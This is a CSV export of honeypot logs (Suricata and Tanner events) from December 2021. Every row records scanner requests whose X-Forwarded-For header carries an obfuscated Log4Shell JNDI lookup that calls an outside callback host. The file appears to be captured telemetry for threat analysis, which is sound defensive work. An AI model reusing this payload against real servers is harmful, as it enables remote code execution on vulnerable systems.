-
Notifications
You must be signed in to change notification settings - Fork 0
/
logstash_raw_2.csv
We can't make this file beautiful and searchable because it's too large.
258 lines (258 loc) · 533 KB
/
logstash_raw_2.csv
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
"@timestamp","@version","_id","_index","_score","_type","agent.ephemeral_id","agent.hostname","agent.id","agent.name","agent.type","agent.version","alert.action","alert.category","alert.gid","alert.metadata.affected_product","alert.metadata.attack_target","alert.metadata.created_at","alert.metadata.deployment","alert.metadata.former_category","alert.metadata.signature_severity","alert.metadata.updated_at","alert.rev","alert.severity","alert.signature","alert.signature_id",app,"app_proto",compCS,"connection.protocol","connection.transport","connection.type","cookies.sess_uuid","dest_ip","dest_port",dist,duration,"ecs.version",encCS,"event_type",eventid,"fatt_http.clientHeaderHash","fatt_http.clientHeaderOrder","fatt_http.requestFullURI","fatt_http.requestMethod","fatt_http.requestURI","fatt_http.requestVersion","fatt_http.userAgent","fatt_ssh.ccacts","fatt_ssh.ccastc","fatt_ssh.ceacts","fatt_ssh.ceastc","fatt_ssh.ckex","fatt_ssh.clcts","fatt_ssh.client","fatt_ssh.clstc","fatt_ssh.cmacts","fatt_ssh.cmastc","fatt_ssh.cshka","fatt_ssh.hassh","fatt_ssh.hasshAlgorithms","fatt_ssh.hasshVersion","fileinfo.filename","fileinfo.gaps","fileinfo.magic","fileinfo.md5","fileinfo.sid","fileinfo.size","fileinfo.state","fileinfo.stored","fileinfo.tx_id",files,"flow.bytes_toclient","flow.bytes_toserver","flow.pkts_toclient","flow.pkts_toserver","flow.start","flow_id","geoip.as_org","geoip.asn","geoip.city_name","geoip.continent_code","geoip.country_code2","geoip.country_code3","geoip.country_name","geoip.dma_code","geoip.ip","geoip.latitude","geoip.location","geoip.longitude","geoip.postal_code","geoip.region_code","geoip.region_name","geoip.timezone",handler,hassh,hasshAlgorithms,"headers.accept","headers.accept-encoding","headers.accept-language","headers.cache-control","headers.connection","headers.cookie","headers.from","headers.host","headers.referer","headers.user-agent","headers.x-forwarded-for","host.name","http.accept_encoding","http.accept_language","http.authorization","http.from","http.hostname","http.http_content_type","http.http_method","http.http_port","http.http_refer","http.http_request_body","http.http_request_body_printable","http.http_response_body","http.http_response_body_printable","http.http_user_agent","http.length","http.protocol","http.status","http.url","http.via","http.xff","icmp_code","icmp_type","in_iface","input.type","ip_rep",kexAlgs,keyAlgs,lang,langCS,level,link,"log.file.path","log.offset",macCS,message,"messageBadrequestsyntax($jndi","metadata.flowbits","metadata.flowints.http.anomaly.count","metadata.flowints.tcp.retransmission.count","metadata.flowints.tls.anomaly.count",method,mod,msg,os,params,password,path,payload,"payload_printable",proto,protocol,query,"raw_freq","raw_hits","raw_mtu","raw_sig",reason,"response_msg.response.message.detection.name","response_msg.response.message.detection.order","response_msg.response.message.detection.type","response_msg.response.message.detection.version","response_msg.response.message.sess_uuid","response_msg.version",sensor,sensorID,session,"smb.client_dialects","smb.command","smb.dialect","smb.id","smb.request.native_lm","smb.request.native_os","smb.response.native_lm","smb.response.native_os","smb.server_guid","smb.session_id","smb.status","smb.status_code","smb.tree_id","src_hostname","src_ip","src_port","ssh.client.hassh.hash","ssh.client.hassh.string","ssh.client.proto_version","ssh.client.software_version","ssh.server.hassh.hash","ssh.server.hassh.string","ssh.server.proto_version","ssh.server.software_version",status,stream,subject,"t-pot_hostname","t-pot_ip_ext","t-pot_ip_int",tags,"tftp.file","tftp.mode","tftp.packet",timestamp,"tls.ja3.hash","tls.ja3.string","tls.ja3s.hash","tls.ja3s.string","tls.session_resumed","tls.sni","tls.version","tx_id",type,uptime,username,uuid,version
"2021-12-15T12:33:57.932Z",1,8CcVvn0B5e7x5EYnyTm3,"logstash-suricata-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1508391989292596,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"139.59.237.99","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,c40384e6859f,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5430,"HTTP/1.1",200,"/core/misc/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,"known attacker",,,,,,,"/data/suricata/log/eve.json",22295050,,"{""timestamp"":""2021-12-15T12:33:57.932284+0000"",""flow_id"":1508391989292596,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""139.59.237.99"",""src_port"":60880,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/core/misc/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5430}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"139.59.237.99",60880,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T12:33:57.932284+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T12:33:57.932Z",1,8ScVvn0B5e7x5EYnyTm3,"logstash-suricata-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"139.59.237.99",60880,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/core/misc/favicon.ico",false,"MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel",cf2445dcb53a031c02f9b57e2199bc03,"[]",5430,CLOSED,false,2,,,,,,,1508391989292596,,,Clifton,NA,US,US,"United States",501,"172.16.0.42","40.8364","{""lon"":-74.1403,""lat"":40.8364}","-74.1403",07014,NJ,"New Jersey","America/New_York",,,,,,,,,,,,,,,c40384e6859f,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5430,"HTTP/1.1",200,"/core/misc/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",22295712,,"{""timestamp"":""2021-12-15T12:33:57.932284+0000"",""flow_id"":1508391989292596,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""139.59.237.99"",""dest_port"":60880,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/core/misc/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5430},""app_proto"":""http"",""fileinfo"":{""filename"":""/core/misc/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""cf2445dcb53a031c02f9b57e2199bc03"",""stored"":false,""size"":5430,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T12:33:57.932284+0000",,,,,,,,,Suricata,,,,
"2021-12-15T12:33:57.695Z",1,wokVvn0B6VkG8jKzzfyg,"logstash-tanner-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"81eb7e4b-359d-4b7f-b136-0091a9a0b343",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"139.59.237.99","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=81eb7e4b-359d-4b7f-b136-0091a9a0b343",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",c40384e6859f,,,,,,,,,,,,,,,,,,,,,,,,log,"known attacker",,,,,,,"/data/tanner/log/tanner_report.json",70096,,"{""method"": ""GET"", ""path"": ""/core/misc/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=81eb7e4b-359d-4b7f-b136-0091a9a0b343""}, ""uuid"": ""6bd4a20d-1527-4091-aa8c-814cba2de48f"", ""peer"": {""ip"": ""139.59.237.99"", ""port"": 60880}, ""status"": 200, ""cookies"": {""sess_uuid"": ""81eb7e4b-359d-4b7f-b136-0091a9a0b343""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""9846a89e-27b8-4514-9f70-00f884470c69""}}}, ""timestamp"": ""2021-12-15T12:33:57.695248""}",,,,,,GET,,,,,,"/core/misc/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","9846a89e-27b8-4514-9f70-00f884470c69","0.6.0",,,,,,,,,,,,,,,,,,"139.59.237.99",60880,,,,,,,,,200,,,inherentfocus,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T12:33:57.695248",,,,,,,,,Tanner,,,"6bd4a20d-1527-4091-aa8c-814cba2de48f",
"2021-12-15T12:33:57.671Z",1,7ycVvn0B5e7x5EYnyTm3,"logstash-suricata-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"139.59.237.99",60880,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, Unicode text, UTF-8 text, with very long lines (399)",ee21e3221e5b9336c5fff029b2cef274,"[]",6957,CLOSED,false,1,,,,,,,1508391989292596,,,Clifton,NA,US,US,"United States",501,"172.16.0.42","40.8364","{""lon"":-74.1403,""lat"":40.8364}","-74.1403",07014,NJ,"New Jersey","America/New_York",,,,,,,,,,,,,,,c40384e6859f,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",6957,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",22294188,,"{""timestamp"":""2021-12-15T12:33:57.671194+0000"",""flow_id"":1508391989292596,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""139.59.237.99"",""dest_port"":60880,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":6957},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""ee21e3221e5b9336c5fff029b2cef274"",""stored"":false,""size"":6957,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T12:33:57.671194+0000",,,,,,,,,Suricata,,,,
"2021-12-15T12:33:57.671Z",1,7icVvn0B5e7x5EYnyTm3,"logstash-suricata-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1508391989292596,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"139.59.237.99","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,c40384e6859f,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",6957,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,"known attacker",,,,,,,"/data/suricata/log/eve.json",22293539,,"{""timestamp"":""2021-12-15T12:33:57.671194+0000"",""flow_id"":1508391989292596,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""139.59.237.99"",""src_port"":60880,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":6957}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"139.59.237.99",60880,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T12:33:57.671194+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T12:33:57.435Z",1,tIkVvn0B6VkG8jKzyfzC,"logstash-tanner-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"81eb7e4b-359d-4b7f-b136-0091a9a0b343",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"139.59.237.99","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=81eb7e4b-359d-4b7f-b136-0091a9a0b343",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",c40384e6859f,,,,,,,,,,,,,,,,,,,,,,,,log,"known attacker",,,,,,,"/data/tanner/log/tanner_report.json",69214,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=81eb7e4b-359d-4b7f-b136-0091a9a0b343""}, ""uuid"": ""6bd4a20d-1527-4091-aa8c-814cba2de48f"", ""peer"": {""ip"": ""139.59.237.99"", ""port"": 60880}, ""status"": 200, ""cookies"": {""sess_uuid"": ""81eb7e4b-359d-4b7f-b136-0091a9a0b343""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""9846a89e-27b8-4514-9f70-00f884470c69""}}}, ""timestamp"": ""2021-12-15T12:33:57.435392""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","9846a89e-27b8-4514-9f70-00f884470c69","0.6.0",,,,,,,,,,,,,,,,,,"139.59.237.99",60880,,,,,,,,,200,,,inherentfocus,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T12:33:57.435392",,,,,,,,,Tanner,,,"6bd4a20d-1527-4091-aa8c-814cba2de48f",
"2021-12-15T12:33:57.421Z",1,7CcVvn0B5e7x5EYnyTm3,"logstash-suricata-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1508391989292596,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"139.59.237.99","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,c40384e6859f,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7554,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,"known attacker",,,,,,,"/data/suricata/log/eve.json",22292061,,"{""timestamp"":""2021-12-15T12:33:57.421239+0000"",""flow_id"":1508391989292596,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""139.59.237.99"",""src_port"":60880,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"139.59.237.99",60880,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T12:33:57.421239+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T12:33:57.421Z",1,7ScVvn0B5e7x5EYnyTm3,"logstash-suricata-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"139.59.237.99",60880,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (399)",22b7d884d99be8e15fc3b1b27008c681,"[]",7554,CLOSED,false,0,,,,,,,1508391989292596,,,Clifton,NA,US,US,"United States",501,"172.16.0.42","40.8364","{""lon"":-74.1403,""lat"":40.8364}","-74.1403",07014,NJ,"New Jersey","America/New_York",,,,,,,,,,,,,,,c40384e6859f,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7554,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",22292699,,"{""timestamp"":""2021-12-15T12:33:57.421239+0000"",""flow_id"":1508391989292596,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""139.59.237.99"",""dest_port"":60880,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""22b7d884d99be8e15fc3b1b27008c681"",""stored"":false,""size"":7554,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T12:33:57.421239+0000",,,,,,,,,Suricata,,,,
"2021-12-15T12:33:57.168Z",1,s4kVvn0B6VkG8jKzyfzC,"logstash-tanner-2021.12.15",,"_doc","d970a961-6bbe-4d88-83c7-dd59704e55de",c40384e6859f,"06196708-e036-4e57-b724-0c9ec0990f91",c40384e6859f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"139.59.237.99","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",c40384e6859f,,,,,,,,,,,,,,,,,,,,,,,,log,"known attacker",,,,,,,"/data/tanner/log/tanner_report.json",68437,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""6bd4a20d-1527-4091-aa8c-814cba2de48f"", ""peer"": {""ip"": ""139.59.237.99"", ""port"": 60880}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""81eb7e4b-359d-4b7f-b136-0091a9a0b343""}}}, ""timestamp"": ""2021-12-15T12:33:57.168181""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","81eb7e4b-359d-4b7f-b136-0091a9a0b343","0.6.0",,,,,,,,,,,,,,,,,,"139.59.237.99",60880,,,,,,,,,200,,,inherentfocus,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T12:33:57.168181",,,,,,,,,Tanner,,,"6bd4a20d-1527-4091-aa8c-814cba2de48f",
"2021-12-15T11:09:44.478Z",1,"riTIvX0B5e7x5EYnsre-","logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1241047123851125,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"159.89.158.150","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,d732b3b75613,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10424,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",48363854,,"{""timestamp"":""2021-12-15T11:09:44.478078+0000"",""flow_id"":1241047123851125,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.89.158.150"",""src_port"":39228,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10424}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.89.158.150",39228,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T11:09:44.478078+0000",,,,,,,,1,Suricata,,,,
